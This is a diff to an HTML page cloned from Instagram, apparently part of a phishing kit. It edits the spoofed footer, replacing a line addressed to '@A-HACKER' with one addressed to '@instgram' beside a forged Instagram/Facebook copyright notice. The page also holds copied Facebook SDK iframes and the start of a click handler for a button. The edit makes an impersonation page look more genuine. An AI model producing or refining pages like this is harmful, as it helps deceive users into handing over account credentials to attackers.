--- a/sites/instagram/index.html
+++ b/sites/instagram/index.html
@@ -119,8 +119,7 @@
 <div id="fb-root" __cpp="1" class=" fb_reset"><div __cpp="1" style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div __cpp="1"><iframe name="fb_xdm_frame_https" frameborder="0" allowtransparency="true" allowfullscreen="true" scrolling="no" allow="encrypted-media" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" __cporiginalvalueofsrc="https://staticxx.facebook.com/connect/xd_arbiter/r/qMnGlIs-JNW.js?version=42#channel=f59a022dfc20ec&amp;origin=https%3A%2F%2Fwww.instagram.com" src="" style="border: none;" __cpp="1"></iframe></div></div><div __cpp="1" style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div __cpp="1"><iframe name="fd64c614204464" frameborder="0" allowtransparency="true" allowfullscreen="true" scrolling="no" allow="encrypted-media" __cporiginalvalueofsrc="https://www.facebook.com/connect/ping?client_id=124024574287414&amp;domain=www.instagram.com&amp;origin=1&amp;redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2FqMnGlIs-JNW.js%3Fversion%3D42%23cb%3Df1f19c0950ec264%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff59a022dfc20ec%26relation%3Dparent&amp;response_type=token%2Csigned_request%2Ccode&amp;sdk=joey&amp;version=v2.2" src="" __cpp="1" style="display: none;"></iframe></div></div></div>
 <center>
 <p>© Instagram. Facebook Inc. 1601 Willow Road, Menlo Park, CA 94025.</p>
-<p>© This message was send to and Intended for @A-HACKER Not your</p>
-<p>acoount? 83522 <a href="http://www.instagram.com">Remove your email</a> from this account.</p>
+<p>© This message was send to and Intended for @instgram</p>
 </center>
 <script>
 $("#butonamca").click(function(){
